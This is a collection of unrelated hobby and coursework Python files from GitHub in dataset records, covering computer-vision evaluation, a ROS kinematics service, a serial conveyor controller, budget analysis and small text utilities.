time.sleep(0.3)\n","repo_name":"leng-yue/ai-arkhelper","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"20744918127","text":"import cv2 as cv\nimport imutils\nimport os\nimage=cv.imread(\"Docu.jpeg\")\n#image=imutils.resize(image,height=400,width=400)\ndef piece_from_img(img):\n dx = img.shape[0] // 8\n dy = img.shape[1] // 8\n # mat = []\n for i in range(0, 8):\n # lis = []\n for j in range(0, 8):\n #points = [[i * dx, j * dy], [(i + 1) * dx, j * dy], [i * dx, (j + 1) * dy], [(i + 1) * dx, (j + 1) * dy]]\n out_image=img[j*dy:(j+1)*dy,i * dx:(i+1)*dx]\n yield out_image\n # lis.append(output)\n # cv.imshow(str(i) + str(j), output)\n # mat.append(lis)\n\ndef extract_piece(image,page):\n img = cv.Canny(image, 2, 10)\n # cv.imshow(\"sh\", img)\n # cv.waitKey(0)\n croppedlis = []\n contours, hierarchy = cv.findContours(img, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv.contourArea(cnt)\n if area > (img.shape[0] * img.shape[1] * 1 / 12): # IMPORTANT:add square condition\n cv.drawContours(image, cnt, -1, (255, 100, 100), 3)\n peri = cv.arcLength(cnt, True)\n approx = cv.approxPolyDP(cnt, 0.02 * peri, False) # getting the boounding box\n x, y, w, h = cv.boundingRect(approx)\n croppedlis.append(image[y:y + h, x:x + w])\n\n #print(area)\n #cv.imshow(\"shs\", image)\n for i in range(len(croppedlis)):\n\n itera = piece_from_img(croppedlis[i])\n while True:\n try:\n yield next(itera)\n except StopIteration:\n break\n #name=\"page_\"+str(page)+\"image\"+str(i+1)+r\".png\"\n #cv.imwrite(name, croppedlis[i])\n #cv.imshow(str(i), croppedlis[i])\n\nos.chdir(r\"C:\\Users\\suhaa\\Desktop\\OCV\\Chess_Detector\\Saves\")\n# 
extract(image,1)\n","repo_name":"neel2299/Chess_Detector","sub_path":"extract_piece.py","file_name":"extract_piece.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37519647943","text":"import airsim\nimport ultralytics\nimport pandas\nfrom ultralytics import YOLO\nfrom ultralytics.engine.results import Results\nfrom sahi.prediction import PredictionResult\nimport os\nimport json\nimport math\nimport numpy as np\nimport polars as pl\nfrom pathlib import Path\nfrom sahi.predict import get_prediction, get_sliced_prediction, predict\nfrom sahi import AutoDetectionModel\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\n\ndef training(config):\n \"\"\"\n Train yolo model based on .yaml configuration file\n Parameters\n ----------\n config, str :\n String path to the .yaml config file\n\n Returns\n -------\n\n \"\"\"\n model = YOLO()\n model.train(cfg=config)\n\n\ndef predict_sahi(weight_path, list_img, slice, overlap, conf,\n device): # batch_size manually changed to 4 for faster result\n \"\"\"\n Predict using sahi based on given parameters\n Parameters\n ----------\n weight_path, str :\n String of the path for the model weights\n list_img, list[Path] :\n List of the path of each images\n slice, list[int, int] :\n List containing width and height of a slice (without overlap)\n overlap, list[int,int] :\n List containing width and height ratio of the overlap\n conf, float\n confidence threshold to count the prediction as valid\n device, int or str :\n define the device use either CPU or GPU\n\n Returns\n -------\n\n \"\"\"\n sahi_model = AutoDetectionModel.from_pretrained(\n model_type='yolov8',\n model_path=weight_path,\n confidence_threshold=conf,\n device=device\n )\n result = {}\n for i in tqdm(list_img):\n result[i.stem] = (get_sliced_prediction(str(i),\n sahi_model,\n slice_width=slice[0],\n slice_height=slice[1],\n overlap_width_ratio=overlap[0],\n overlap_height_ratio=overlap[1],\n verbose=0),)\n return result\n\n\ndef get_img_log(img_name, log_path):\n \"\"\"\n Load the data of one image in the log file\n Parameters\n ----------\n img_name, str :\n name of the image\n log_path, Path :\n Path of the log file\n\n Returns, dict :\n Dict containing the image parameters and data in the simulation\n -------\n\n \"\"\"\n sim_number, frame_number, _ = img_name.split(\"_\")\n sim_number = str(int(sim_number))\n frame_number = str(int(frame_number))\n with open(log_path) as json_file:\n sim_log = json.load(json_file)\n result_dict = sim_log[sim_number][\"frame_data\"][frame_number]\n dict_items = list(result_dict.items())\n dict_items.insert(2, (\"weather\", sim_log[sim_number][\"weather\"]))\n\n return dict(dict_items)\n\n\ndef reformat_predict(result_dict):\n \"\"\"\n Change result to common result dict format between Yolov8 and SAHI\n Parameters\n ----------\n result_dict, result from Prediction (SAHI or normal YOLO)\n\n Returns, dict :\n Common result format\n -------\n\n \"\"\"\n # bbx format xmax,ymax,xmin,ymin\n return_dict = {}\n counter = 1\n if type(result_dict) == Results:\n for pred in result_dict.boxes.data.tolist():\n return_dict[counter] = {\"class\": int(pred[5]),\n \"bbx\": [pred[2], pred[3], pred[0], pred[1]],\n \"conf\": pred[4]}\n counter += 1\n elif type(result_dict[0]) == PredictionResult:\n for pred in result_dict[0].object_prediction_list:\n return_dict[counter] = {\"class\": pred.category.id,\n \"bbx\": [pred.bbox.maxx, pred.bbox.maxy,\n pred.bbox.minx, 
pred.bbox.miny],\n \"conf\": pred.score.value}\n counter += 1\n return return_dict\n\n\ndef compute_iou(box1, box2):\n \"\"\"\n Compute the IoU between 2 bbx\n Parameters\n ----------\n box1, list[int] :\n [xmax, ymax, xmin, ymin]\n box2, list[int] :\n [xmax, ymax, xmin, ymin]\n\n Returns\n -------\n\n \"\"\"\n xmax1, ymax1, xmin1, ymin1 = box1\n xmax2, ymax2, xmin2, ymin2 = box2\n x_left = max(xmin1, xmin2)\n y_top = max(ymin1, ymin2)\n x_right = min(xmax1, xmax2)\n y_bottom = min(ymax1, ymax2)\n if x_right < x_left or y_bottom < y_top:\n return 0.0\n intersection_area = (x_right - x_left) * (y_bottom - y_top)\n box1_area = (xmax1 - xmin1) * (ymax1 - ymin1)\n box2_area = (xmax2 - xmin2) * (ymax2 - ymin2)\n union_area = box1_area + box2_area - intersection_area\n iou = intersection_area / union_area\n return iou\n\n\ndef add_to_df2(df, img_log, pred_result, img_path, IOU_threshold):\n \"\"\"\n Add a row to the polars dataframe depending on the prediction result\n Parameters\n ----------\n df, Polars dataframe :\n The current polars dataframe\n img_log, dict :\n Dict containing the image data from the log\n pred_result, dict :\n Prediction data made by the model\n img_path, Path :\n Image path\n IOU_threshold, float :\n Value of the IoU threshold to be considered a valid prediction\n\n Returns\n -------\n\n \"\"\"\n angle = img_path.stem.split(\"_\")[2]\n list_key = [key for key in list(img_log.keys())[4:] if key.split(\"_\")[0] == angle]\n pred_per_key = {}\n for key in list_key:\n pred_per_key[key] = 0\n for pred_key in pred_result.keys():\n max_IOU = -1\n best_key = None\n for key in list_key:\n truth_box = [img_log[key][\"label\"][\"box2D\"][\"x_max\"],\n img_log[key][\"label\"][\"box2D\"][\"y_max\"],\n img_log[key][\"label\"][\"box2D\"][\"x_min\"],\n img_log[key][\"label\"][\"box2D\"][\"y_min\"]]\n key_IOU = compute_iou(pred_result[pred_key][\"bbx\"], truth_box)\n if max_IOU < key_IOU:\n max_IOU = key_IOU\n best_key = key\n if max_IOU >= IOU_threshold:\n # save as TP\n truth_box = [img_log[best_key][\"label\"][\"box2D\"][\"x_max\"],\n img_log[best_key][\"label\"][\"box2D\"][\"y_max\"],\n img_log[best_key][\"label\"][\"box2D\"][\"x_min\"],\n img_log[best_key][\"label\"][\"box2D\"][\"y_min\"]]\n\n new_img_row_data = {\n 'Img_path': [str(img_path)],\n 'Weather_param': [img_log[\"weather\"][\"param\"]],\n 'Weather_value': [img_log[\"weather\"][\"val\"]],\n 'Level': [img_log[\"currentlevel\"]],\n 'Timeoftheday': [img_log[\"timeoftheday\"]],\n 'Yolo_class_truth': [img_log[best_key][\"label\"][\"yolo_class\"]],\n 'Yolo_class_pred': [pred_result[pred_key][\"class\"]],\n 'Conf': [pred_result[pred_key][\"conf\"]],\n 'Object_name': [img_log[best_key][\"label\"][\"name\"]],\n 'Box2D_pred': [pred_result[pred_key][\"bbx\"]],\n 'Box2D_truth': [truth_box],\n 'Pred_result': [\"TP\"],\n 'Duplicate?': [False],\n 'Distance': [img_log[best_key][\"label\"][\"distance\"]]\n }\n pred_per_key[best_key] += 1\n else:\n # save as FP\n new_img_row_data = {\n 'Img_path': [str(img_path)],\n 'Weather_param': [img_log[\"weather\"][\"param\"]],\n 'Weather_value': [img_log[\"weather\"][\"val\"]],\n 'Level': [img_log[\"currentlevel\"]],\n 'Timeoftheday': [img_log[\"timeoftheday\"]],\n 'Yolo_class_truth': [None],\n 'Yolo_class_pred': [pred_result[pred_key][\"class\"]],\n 'Conf': [pred_result[pred_key][\"conf\"]],\n 'Object_name': [None],\n 'Box2D_pred': [pred_result[pred_key][\"bbx\"]],\n 'Box2D_truth': [None],\n 'Pred_result': [\"FP\"],\n 'Duplicate?': [False],\n 'Distance': [None]\n }\n new_img_row = 
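# --- Editor's worked example using the compute_iou defined above (example
# values are mine, not from the repo). Boxes are [xmax, ymax, xmin, ymin]:
# (0,0)-(2,2) and (1,1)-(3,3) overlap in a 1x1 square, union = 4 + 4 - 1 = 7,
# so IoU = 1/7.
box_a = [2, 2, 0, 0]
box_b = [3, 3, 1, 1]
assert abs(compute_iou(box_a, box_b) - 1 / 7) < 1e-9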
pl.DataFrame(new_img_row_data, schema={'Img_path': pl.datatypes.Utf8,\n 'Weather_param': pl.datatypes.Int32,\n 'Weather_value': pl.datatypes.Float32,\n 'Level': pl.datatypes.Utf8,\n 'Timeoftheday': pl.datatypes.Utf8,\n 'Yolo_class_truth': pl.datatypes.Int32,\n 'Yolo_class_pred': pl.datatypes.Int32,\n 'Conf': pl.datatypes.Float32,\n 'Object_name': pl.datatypes.Utf8,\n 'Box2D_pred': pl.datatypes.List(\n pl.datatypes.Float32),\n 'Box2D_truth': pl.datatypes.List(\n pl.datatypes.Float32),\n 'Pred_result': pl.datatypes.Utf8,\n 'Duplicate?': pl.datatypes.Boolean,\n 'Distance': pl.datatypes.Float32})\n df = df.extend(new_img_row)\n for count_key in pred_per_key.keys():\n if pred_per_key[count_key] == 0:\n # save as FN\n truth_box = [img_log[count_key][\"label\"][\"box2D\"][\"x_max\"],\n img_log[count_key][\"label\"][\"box2D\"][\"y_max\"],\n img_log[count_key][\"label\"][\"box2D\"][\"x_min\"],\n img_log[count_key][\"label\"][\"box2D\"][\"y_min\"]]\n new_img_row_data = {\n 'Img_path': [str(img_path)],\n 'Weather_param': [img_log[\"weather\"][\"param\"]],\n 'Weather_value': [img_log[\"weather\"][\"val\"]],\n 'Level': [img_log[\"currentlevel\"]],\n 'Timeoftheday': [img_log[\"timeoftheday\"]],\n 'Yolo_class_truth': [img_log[count_key][\"label\"][\"yolo_class\"]],\n 'Yolo_class_pred': [None],\n 'Conf': [None],\n 'Object_name': [img_log[count_key][\"label\"][\"name\"]],\n 'Box2D_pred': [None],\n 'Box2D_truth': [truth_box],\n 'Pred_result': [\"FN\"],\n 'Duplicate?': [False],\n 'Distance': [img_log[count_key][\"label\"][\"distance\"]]\n }\n new_img_row = pl.DataFrame(new_img_row_data, schema={'Img_path': pl.datatypes.Utf8,\n 'Weather_param': pl.datatypes.Int32,\n 'Weather_value': pl.datatypes.Float32,\n 'Level': pl.datatypes.Utf8,\n 'Timeoftheday': pl.datatypes.Utf8,\n 'Yolo_class_truth': pl.datatypes.Int32,\n 'Yolo_class_pred': pl.datatypes.Int32,\n 'Conf': pl.datatypes.Float32,\n 'Object_name': pl.datatypes.Utf8,\n 'Box2D_pred': pl.datatypes.List(\n pl.datatypes.Float32),\n 'Box2D_truth': pl.datatypes.List(\n pl.datatypes.Float32),\n 'Pred_result': pl.datatypes.Utf8,\n 'Duplicate?': pl.datatypes.Boolean,\n 'Distance': pl.datatypes.Float32})\n df = df.extend(new_img_row)\n elif pred_per_key[count_key] > 1:\n # duplicate pred ?\n conditions = (df[\"Img_path\"] == str(img_path)) & (df[\"Pred_result\"] == \"TP\") & (\n df[\"Object_name\"] == img_log[count_key][\"label\"][\"name\"])\n df = df.with_columns(pl.when(conditions).then(True).otherwise(df['Duplicate?']).alias('Duplicate?'))\n return df\n\n\ndef create_evaluation_df(data_path, reformed_results, log_path, conf, save_flag):\n \"\"\"\n Creates the evaluation dataframe\n Parameters\n ----------\n data_path, Path :\n Path of the data\n reformed_results, Dict :\n Reformed_result dict\n log_path, Path :\n Path of the log data file\n conf, float :\n confidence threshold\n save_flag, bool :\n flag to save the df into a json\n\n Returns\n -------\n\n \"\"\"\n\n data_dict = {\n 'Img_path': [],\n 'Weather_param': [],\n 'Weather_value': [],\n 'Level': [],\n 'Timeoftheday': [],\n 'Yolo_class_truth': [],\n 'Yolo_class_pred': [],\n 'Conf': [],\n 'Object_name': [],\n 'Box2D_pred': [],\n 'Box2D_truth': [],\n 'Pred_result': [],\n 'Duplicate?': [],\n 'Distance': []\n }\n df = pl.DataFrame(data_dict, schema={'Img_path': pl.datatypes.Utf8,\n 'Weather_param': pl.datatypes.Int32,\n 'Weather_value': pl.datatypes.Float32,\n 'Level': pl.datatypes.Utf8,\n 'Timeoftheday': pl.datatypes.Utf8,\n 'Yolo_class_truth': pl.datatypes.Int32,\n 'Yolo_class_pred': pl.datatypes.Int32,\n 
'Conf': pl.datatypes.Float32,\n 'Object_name': pl.datatypes.Utf8,\n 'Box2D_pred': pl.datatypes.List(pl.datatypes.Float32),\n 'Box2D_truth': pl.datatypes.List(pl.datatypes.Float32),\n 'Pred_result': pl.datatypes.Utf8,\n 'Duplicate?': pl.datatypes.Boolean,\n 'Distance': pl.datatypes.Float32})\n for img_path in tqdm(data_path.iterdir()):\n img_log = get_img_log(img_path.stem, log_path)\n df = add_to_df2(df, img_log, reformed_results[img_path.stem], img_path, conf)\n if save_flag:\n df.write_json(file=str(data_path.parent / 'test_data.json'), row_oriented=True, pretty=True)\n return df\n\n\ndef good_split_slice(number):\n \"\"\"\n Split a number into the highest decomposition where a x b = number\n Parameters\n ----------\n number, int :\n Number you want to split in 2\n\n Returns a,b, int :\n highest decompostion number\n -------\n\n \"\"\"\n if number == 1:\n return 1, 1\n a = int(number ** 0.5)\n while a > 0:\n if number % a == 0:\n b = number // a\n if a == 1:\n raise ValueError(\"The number of slice cannot be divided properly change the number of slice\")\n else:\n return a, b\n a -= 1\n\n\ndef generate_graph(df, graphdict):\n \"\"\"\n Generate graph with parameters depending on graphdict\n Parameters\n ----------\n json_path, Path :\n Path of the dataframe json\n graphdict, dic :\n dict containing x and y field for the graph\n\n Returns\n -------\n\n \"\"\"\n colors = ['red', 'blue', 'green', 'yellow', 'orange', 'purple', 'cyan', 'magenta', 'pink', 'brown']\n bar_width = 0.2\n for dict_axis in graphdict:\n\n unique_val_x = df[dict_axis[\"x\"]].unique().to_list()\n unique_val_y = df[dict_axis[\"y\"]].unique().to_list()\n\n dict_val = {}\n if dict_axis[\"y\"] == \"Distance\":\n unique_val_y = [item for item in unique_val_y if item is not None]\n quotient = (round((max(unique_val_y) / 500)))\n max_range = quotient * 500\n list_axis = np.linspace(0, max_range, quotient + 1)\n unique_val_y = []\n for i in range(1, len(list_axis)):\n unique_val_y.append(str(int(list_axis[i - 1])) + \"_\" + str(int(list_axis[i])))\n for x_val in unique_val_x:\n dict_val[x_val] = []\n for y_val in unique_val_y:\n lower_range, higher_range = y_val.split(\"_\")\n dict_val[x_val].append(df.filter(\n (pl.col(dict_axis[\"y\"]) > int(lower_range)) & (pl.col(dict_axis[\"y\"]) <= int(higher_range)) & (\n pl.col(dict_axis[\"x\"]) == x_val)).shape[0])\n else:\n for x_val in unique_val_x:\n dict_val[x_val] = []\n for y_val in unique_val_y:\n dict_val[x_val].append(\n df.filter((pl.col(dict_axis[\"y\"]) == y_val) & (pl.col(dict_axis[\"x\"]) == x_val)).shape[0])\n index = np.arange(len(unique_val_y))\n\n counter = 0\n print(sorted(dict_val.keys()))\n for i in sorted(dict_val.keys()):\n\n plt.bar(index + counter * bar_width, dict_val[i], bar_width, label=i, color=colors[counter])\n counter += 1\n if counter == 10:\n raise ValueError(\"More than 10 different parameter isn't supported for more readable plot\")\n plt.xlabel('Parameters')\n plt.ylabel('Count')\n plt.title(dict_axis[\"y\"] + \" over \" + dict_axis[\"x\"])\n plt.xticks(index + bar_width, unique_val_y)\n\n plt.legend()\n plt.show()\n\n\ndef evaluate_model(weigth_path, img_path, log_path, model_type, IoU_threshold, slice_size, overlap, conf, device = \"cuda:0\", save = True):\n \"\"\"\n Run inference on some image and generate a polars Dataframe (possibility to save it thanks to save flag)\n Parameters\n ----------\n weigth_path, Path :\n Path of the .pt file\n img_path, Path :\n Path of the img directory\n log_path, Path :\n Path of the log file\n model_type, 
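# --- Editor's worked example (values mine, not from the repo): good_split_slice
# above returns the most-square factor pair of its argument, e.g. 12 -> (3, 4)
# and 1 -> (1, 1); a prime such as 7 only splits as 1 x 7, so it raises.
assert good_split_slice(12) == (3, 4)
assert good_split_slice(1) == (1, 1)
# good_split_slice(7) raises ValueError: the slice count cannot be divided properly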
\"Yolov8\" or \"SAHI\" :\n Type of inference for predict\n IoU_threshold, float :\n Value of the IoU threshold to consider a prediction TP\n slice_size, list[int,int] :\n Size of a slice (whithout overlap)\n overlap, list[float,float] :\n Percentage of the overlap for a slice\n conf, float :\n Confidence Threshold for valid guess\n device, str :\n Name of the device used for the inference\n save, bool :\n Flag to save the polars dataframe\n\n Returns\n -------\n\n \"\"\"\n list_img = list(img_path.iterdir())\n if model_type == \"SAHI\":\n result = predict_sahi(weigth_path,list_img,slice_size,\n overlap,conf,device)\n elif model_type == \"Yolov8\":\n model = YOLO(str(weigth_path))\n result = {}\n for i in tqdm(list_img):\n result[i.stem] = model.predict(str(i))[0]\n else :\n raise ValueError(\"Model Type not recognize, use \\\"Yolov8\\\" or \\\"SAHI\\\"\")\n reformed_result = {}\n for i in result.keys():\n reformed_result[i] = reformat_predict(result[i])\n eval_df = create_evaluation_df(img_path, reformed_result, log_path, IoU_threshold, save)\n return eval_df\n","repo_name":"Alcharyx/IRP-Eye-out","sub_path":"src/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":19837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16350596043","text":"import asyncio\nimport logging\n\nimport aiohttp\n\nimport sql\nfrom pipeline import TrainingData, Scoring, Actuals, StationDataImporter, TripDataImporter\nfrom pathlib import Path\nimport zipfile\nlogger = logging.getLogger(__name__)\n\n\ndef export_training_data():\n TrainingData().process()\n\n\nasync def import_data():\n await StationDataImporter().run()\n\n with zipfile.ZipFile('./data/data.zip', 'r') as file:\n file.extractall('./data')\n\n for path in sorted(Path('./data').iterdir()):\n if not path.name.endswith('.csv'):\n continue\n await TripDataImporter(path).run()\n path.unlink()\n\n\nasync def score():\n async with aiohttp.ClientSession() as session:\n scoring = Scoring(session)\n while True:\n try:\n await scoring.predict()\n await asyncio.sleep(10)\n except Exception as e:\n logger.error(e)\n await asyncio.sleep(100)\n\n\nasync def actual_submit():\n async with aiohttp.ClientSession() as session:\n actuals = Actuals(session)\n while True:\n try:\n await actuals.upload()\n await asyncio.sleep(600)\n except Exception as e:\n logger.error(e)\n await asyncio.sleep(100)\n\n\nif __name__ == '__main__':\n # initialization\n sql.create_database()\n sql.create_tables()\n\n # configure logger\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n\n # start run loop\n loop = asyncio.get_event_loop()\n loop.create_task(import_data())\n loop.run_forever()\n loop.close()\n","repo_name":"automactic/BlueBike","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7291117267","text":"from tutorial_interfaces.srv import FirstService\n\nimport rclpy\nfrom rclpy.node import Node\n\nimport numpy as np\n\n\nclass MinimalService(Node):\n\n def __init__(self):\n super().__init__('minimal_service')\n self.srv = self.create_service(FirstService, 'inverse', self.service_callback)\n\n def service_callback(self, request, response):\n #response.sum = request.a + request.b\n \n x=request.x\n y=request.y\n z= request.z\n \n \n l1=2.0\n l2=1.0\n l3=1.0\n \n Q3=l1-z\n \n n=(x**2+y**2-l2**2-l3**2)\n d=2*l2*l3\n \n Q2=np.arccos(n/d)\n \n 
\n        n_1=(l2+l3*np.cos(Q2))*x +(l3*np.sin(Q2)*y)\n        d_1=(l2+l3*np.cos(Q2))**2+(l3*np.sin(Q2))**2\n        \n        Q1=np.arccos(n_1/d_1)\n        \n        self.get_logger().info('The Joint values are Q1: %f Q2: %f and Q3:%f' % (Q1,Q2,Q3))\n        \n        response.q1=Q1\n        response.q2=Q2\n        response.q3=Q3\n\n        return response\n\n\ndef main(args=None):\n    rclpy.init(args=args)\n\n    minimal_service = MinimalService()\n\n    rclpy.spin(minimal_service)\n\n    rclpy.shutdown()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"swagholikar29/RBE500-Projects","sub_path":"Project_1/src/inverse_kinematics/inverse_kinematics/service_member_function.py","file_name":"service_member_function.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12672704369","text":"import unittest\nimport pandas as pd\n\nfrom monitoring_service.stat_tests import ks_test, chi_square_test, bayesian_a_b_test\n\n\ndef test_ks_test():\n    ref = pd.DataFrame({\"a\": [10.5, 16, 11.1]})\n    cur = pd.DataFrame({\"a\": [21, 33, 22.2]})\n    p = ks_test(reference_data=ref['a'], current_data=cur['a'], resample=True)\n    assert round(p, 1) == 0.1\n\n\ndef test_chi_square_test():\n    ref = pd.DataFrame({\"a\": [10, 16, 11]})\n    cur = pd.DataFrame({\"a\": [20, 32, 22]})\n    p = chi_square_test(reference_data=ref['a'], current_data=cur['a'], resample=True)\n    assert p == 0.0\n\n\ndef test_bayesian_a_b_test():\n    ref = pd.DataFrame({\"a\": [10.5, 16, 11.1]})\n    cur = pd.DataFrame({\"a\": [21, 33, 22.2]})\n    p = bayesian_a_b_test(a_array=ref['a'], b_array=cur['a'])\n    assert round(p, 1) == 0.5\n","repo_name":"nlinc1905/drift-monitoring","sub_path":"tests/test_stat_tests.py","file_name":"test_stat_tests.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36838507663","text":"# Author: Gabriel Dinse\n# File: conveyor_belt_controller\n# Date: 21/05/2019\n# Made with PyCharm\n\n# Standard Library\n\n# Third party modules\nfrom PyQt5.QtSerialPort import QSerialPort, QSerialPortInfo\n\n# Local application imports\n\n\nclass ConveyorController(QSerialPort):\n    \"\"\"\n    Class responsible for serial communication with the Arduino, as well as\n    for sending the start and stop commands to the conveyor belt.\n    \"\"\"\n    def __init__(self, debug=False, vendor_id=6790, product_id=29987,\n                 start_command=b'(A)', stop_command=b'(S)'):\n        super().__init__()\n        self.vendor_id = vendor_id\n        self.product_id = product_id\n        self.start_command = start_command\n        self.stop_command = stop_command\n        self.available_to_use = False\n        self.online = False\n        self.running = False\n        self.debug = debug\n\n        if self.debug:\n            print('\\n- - - - - - - - - - - - - - - - - - - - - - - - - - -')\n            print('Number of serial ports connected to the PC: {}'.format(\n                len(QSerialPortInfo().availablePorts())))\n\n        for port_info in QSerialPortInfo().availablePorts():\n            if (port_info.hasVendorIdentifier() and\n                    port_info.hasProductIdentifier()):\n                if (port_info.vendorIdentifier() == vendor_id and\n                        port_info.productIdentifier() == product_id):\n                    self.port_name = port_info.portName()\n                    self.available_to_use = True\n\n        if self.available_to_use:\n            if self.debug:\n                print('Conveyor belt control device found'\n                      ' successfully!')\n            self.setPortName(self.port_name)\n            self.setBaudRate(QSerialPort.Baud9600, QSerialPort.AllDirections)\n            self.setDataBits(QSerialPort.Data8)\n            self.setParity(QSerialPort.NoParity)\n            self.setStopBits(QSerialPort.OneStop)\n            
self.setFlowControl(QSerialPort.NoFlowControl)\n\n            # After all settings are applied, try to connect to the serial port\n            if self.open(QSerialPort.ReadWrite):\n                if self.debug:\n                    print('Communication established successfully!')\n                self.online = True\n            else:\n                if self.debug:\n                    print('Error: could not establish communication'\n                          ' with the conveyor belt control device.')\n        else:\n            if self.debug:\n                print('Warning: conveyor belt control device '\n                      'not found.')\n            print('- - - - - - - - - - - - - - - - - - - - - - - - - - -\\n')\n\n    def start(self):\n        \"\"\" Sends the start command. \"\"\"\n        if self.isWritable():\n            if self.debug:\n                print('Command: start conveyor belt')\n            self.write(self.start_command)\n            self.running = True\n\n    def stop(self):\n        \"\"\" Sends the stop command. \"\"\"\n        if self.isWritable():\n            if self.debug:\n                print('Command: stop conveyor belt')\n            self.write(self.stop_command)\n            self.running = False\n","repo_name":"gabrieldinse/oranges_identifier","sub_path":"conveyor_belt_controller.py","file_name":"conveyor_belt_controller.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2157085483","text":"import requests, sys\nurl='https://justinjackson.ca/words.html'\nresponse = requests.get(url)\nnum_word=0\nif response.status_code != 200:\n    print(f\"cannot connect to url {url}\")\n    sys.exit(1)\nres=response.text.split('\\n')\nfor line in res:\n    line = line.strip()\n    if not line.startswith('<'):\n        for word in line.split():\n            word=word.strip()\n            if not word.startswith('<'):\n                num_word=num_word+1\n        print(line)\nprint(f\"{num_word} is number of words in the page not including the headers\")","repo_name":"Farreeda/Fareeda-SavageCamp","sub_path":"requestex.py","file_name":"requestex.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39000075932","text":"# 03 - Python Homework\n# PyBank\n\n# import modules \nimport os\nimport csv\n\n# list used to store data\nmonths = []\nprofit_losses = []\nprofit_var = []\n# placeholder to keep tally of profit while performing arithmetic\nprofit_tally = 0\n\ncsvpath = os.path.join('Resources', 'budget_data.csv')\n\n# open file and set to read w/ commas separating\nwith open(csvpath, newline=\"\") as csvfile:\n    csvreader = csv.reader(csvfile, delimiter=\",\")\n    csv_header = next(csvreader) \n# show file object to be read\n    print(csvreader)\n\n    # populate the months list with data from 1st column (skip header)\n    # find length of months list\n    for row in csvreader:\n        \n        months.append(row[0])\n        length = len(months)\n\n    #print(\"Total Months: \" + str(length))\n\n# Find the total profit\n    \nwith open(csvpath, newline=\"\") as csvfile:\n    csvreader = csv.reader(csvfile, delimiter=\",\")\n    csv_header = next(csvreader)\n    \n    # populate the profit/losses list with column 2 data (skip header) \n    for row in csvreader:\n        profit_losses.append(int(row[1]))\n    \n    # add the numbers in the list w/ the sum function\n    profit_tally = (sum(profit_losses))\n    \n    #create list of the differences between values in profit/losses list\n\n    profit_var = [profit_losses[i+1]-profit_losses[i]\n                  for i in range(len(profit_losses)-1)]\n    \n    # calculate the average of the list of differences\n    # and assign to new variable: avg_profit_var.\n    avg_profit_var = round(sum(profit_var) / len(profit_var), 2)\n    \n\n    # find the greatest increase in profits (date and amount) over the entire period\n    # and 
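# --- Editor's sketch (illustration only, not in the original script): the
# profit_var comprehension above builds month-over-month deltas; zipping the
# list against its one-step shift is an equivalent spelling.
profits = [100, 120, 90, 150]
deltas = [b - a for a, b in zip(profits, profits[1:])]
assert deltas == [20, -30, 60]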
assign to variable: max_profit_var.\n    max_profit_var = max(profit_var)\n    # find index of the biggest increase in profit variance list &\n    # find the month at that index in months list\n    best_month = months[profit_var.index(max_profit_var)]\n    #print(best_month)\n\n    \n    # find the greatest decrease in profits (date and amount) over the entire period\n    # and assign to variable: min_profit_var.\n    min_profit_var = min(profit_var)\n    # find index of the biggest decrease in profit variance list &\n    # find the month at that index in months list\n    worst_month = months[profit_var.index(min_profit_var)]\n    \n# Print out report\nprint(\"Financial Analysis\")\nprint(\"****************************************\") \nprint(\"Total Months: \" + str(length))\nprint(\"Total Profit: $\", str(profit_tally)) \nprint(\"Average Change: $\", str(avg_profit_var))\nprint(\"Largest Increase in Profits: $\", str(max_profit_var), best_month)\nprint(\"Largest Decrease in Profits: $\", str(min_profit_var), worst_month)\n\n# Specify the file to write to\noutput_path = os.path.join(\"output\", \"new.txt\")\n\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, 'w') as txtfile:\n\n    txtfile.write(\"Financial Analysis\")\n    txtfile.write(\"****************************************\") \n    txtfile.write(\"Total Months: \" + str(length))\n    txtfile.write(\"Total Profit: $\" + str(profit_tally)) \n    txtfile.write(\"Average Change: $\" + str(avg_profit_var))\n    txtfile.write(\"Largest Increase in Profits: $\" + str(max_profit_var) + best_month)\n    txtfile.write(\"Largest Decrease in Profits: $\" + str(min_profit_var) + worst_month)\n\n\n\n\n\n\n","repo_name":"mpatterson73/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36852387961","text":"#Finds words that are in input file\r\ndef wordFind(inputfile,found): \r\n    with open(inputfile,'r') as file: #open file to be read\r\n        linenum=1;\r\n        foundnum=0;\r\n        # read each line \r\n        for line in file: \r\n            # read each word \r\n            for word in line.split(): #for words in line\r\n                # display the result \r\n                if(word == found): #match the word with user entered word.\r\n                    print(word,\" was found on line \",linenum)\r\n                    foundnum+=1\r\n            linenum+=1 \r\n        if(foundnum == 0):\r\n            print(found,\" was not found\")\r\n\r\n#main \r\nif __name__ == \"__main__\":\r\n    inputfile = str(input(\"Enter File Name: \"))\r\n    found = str(input(\"Enter name to be Searched in File: \"))\r\n    wordFind(inputfile,found)#call 